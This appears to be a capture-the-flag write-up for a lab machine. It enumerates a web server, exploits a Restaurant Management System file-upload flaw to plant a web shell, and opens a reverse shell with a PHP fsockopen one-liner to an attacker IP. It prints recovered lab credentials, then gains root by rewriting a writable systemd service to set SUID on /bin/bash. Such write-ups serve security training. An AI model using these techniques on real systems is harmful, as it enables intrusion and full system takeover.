# Summary
**We scan the box and found that port 22,12340 is open while 9250 is filtered. We found that 12340 is running a HTTP server. After directory brute-forcing, we found a directory which is hosting RMS (Restaurant Managment System). With some research we found out that the system is vulnerable to arbirtary file upload which leads to Remote Code Execution.**

# Enumeration
## NMAP
```txt
Open 10.10.190.224:22
Open 10.10.190.224:12340
```
- And NMAP died saying no host were alive.

## Web (Port 12340)
- We get 404 page `Resource not found`
- Page is running PHP 5.4.16 and Apache 2.4.6
### Gobuster
```txt
301        7l       20w      239c http://10.10.190.224:12340/rms
301        7l       20w      245c http://10.10.190.224:12340/rms/admin
301        7l       20w      246c http://10.10.190.224:12340/rms/images
```
- Looks like we found something
- Directed to login page.
- We can create a user. We can then place orders, tables and rate the restaurant. But we can't access the administrator panel.
- We can try brute-forcing the login page but no luck.

# Exploit
- Searching up `Restaurant Managment System exploit` and found one on [exploitDB](https://www.exploit-db.com/exploits/47520)
- The exploit works by uploading a web shell to `/images/`.
- Now when we navigate to `/rms/images/reverse-shell.php`. It should exist. The exploit works with RCE by using the GET request.
`uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0`
- Now get a shell.
```php
php -r '$sock=fsockopen("10.17.1.163",9001);exec("sh <&3 >&3 2>&3");'
```

# Post-Exploit
## Internal Enumeration
- User Apache, edward
- Found config.php in `/var/www/html/rms/admin/connection`
```php
<?php
    define('DB_HOST', 'localhost');
    define('DB_USER', 'root');
    define('DB_PASSWORD', '');
    define('DB_DATABASE', 'rms');
    define('APP_NAME', 'Pathfinder Hotel');
```
- No password but can't connect.
- Run linpeas.

### Interesting Findings
```txt
/etc/systemd/system/multi-user.target.wants/zeno-monitoring.service
/etc/systemd/system/zeno-monitoring.service
Linux version 3.10.0-1160.36.2.el7.x86_64
-rw-------. 1 edward edward 1 Sep 21 22:27 /home/edward/.ssh/authorized_keys
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
	═╣ Credentials in fstab/mtab? ........... /etc/fstab:#//10.10.10.10/secret-share	/mnt/secret-share	cifs	_netdev,vers=3.0,ro,username=zeno,password=FrobjoodAdkoonceanJa,domain=localdomain,soft	0 0
    define('DB_USER', 'root');
    define('DB_DATABASE', 'dbrms');
    define('DB_PASSWORD', 'veerUffIrangUfcubyig');

```
- Check out the database first.
- users table is empty?
- Another interesting table is members
- We find the credentials for user Edward.
```sql
17 | edward        | zeno          | edward@zeno.com                   | 6f72ea079fd65aff33a67a3f3618b89c
```
#### Privilege Escalation
- Can't crack the hash. The password for the DB is also not reused.
- We still have one password from `/etc/fstab`
- And we can login as user edward!
- User edward can run `/usr/sbin/reboot` as root.
- We're able to write to `/etc/systemd/system/zeno-monitoring.service`
- So maybe we edit the service file and reboot the box?
```bash
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/root/zero-monitoring.py

[Install]
WantedBy=multi-user.target
```
- Let's make it malicious
```bash
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/chmod 4777 /bin/bash

[Install]
WantedBy=multi-user.target
```
**Note that in a service file you need to call the binary from it's absolute path or it will not work!**
- Now since we have reboot privileges, let's reboot the box.
- After a while, we can check that `/bin/bash` now has SUID bit.
```bash
-rwsrwxrwx. 1 root root 964536 Apr  1  2020 /bin/bash
```
- We can escalate our shell to a root shell by using `/bin/bash -p`


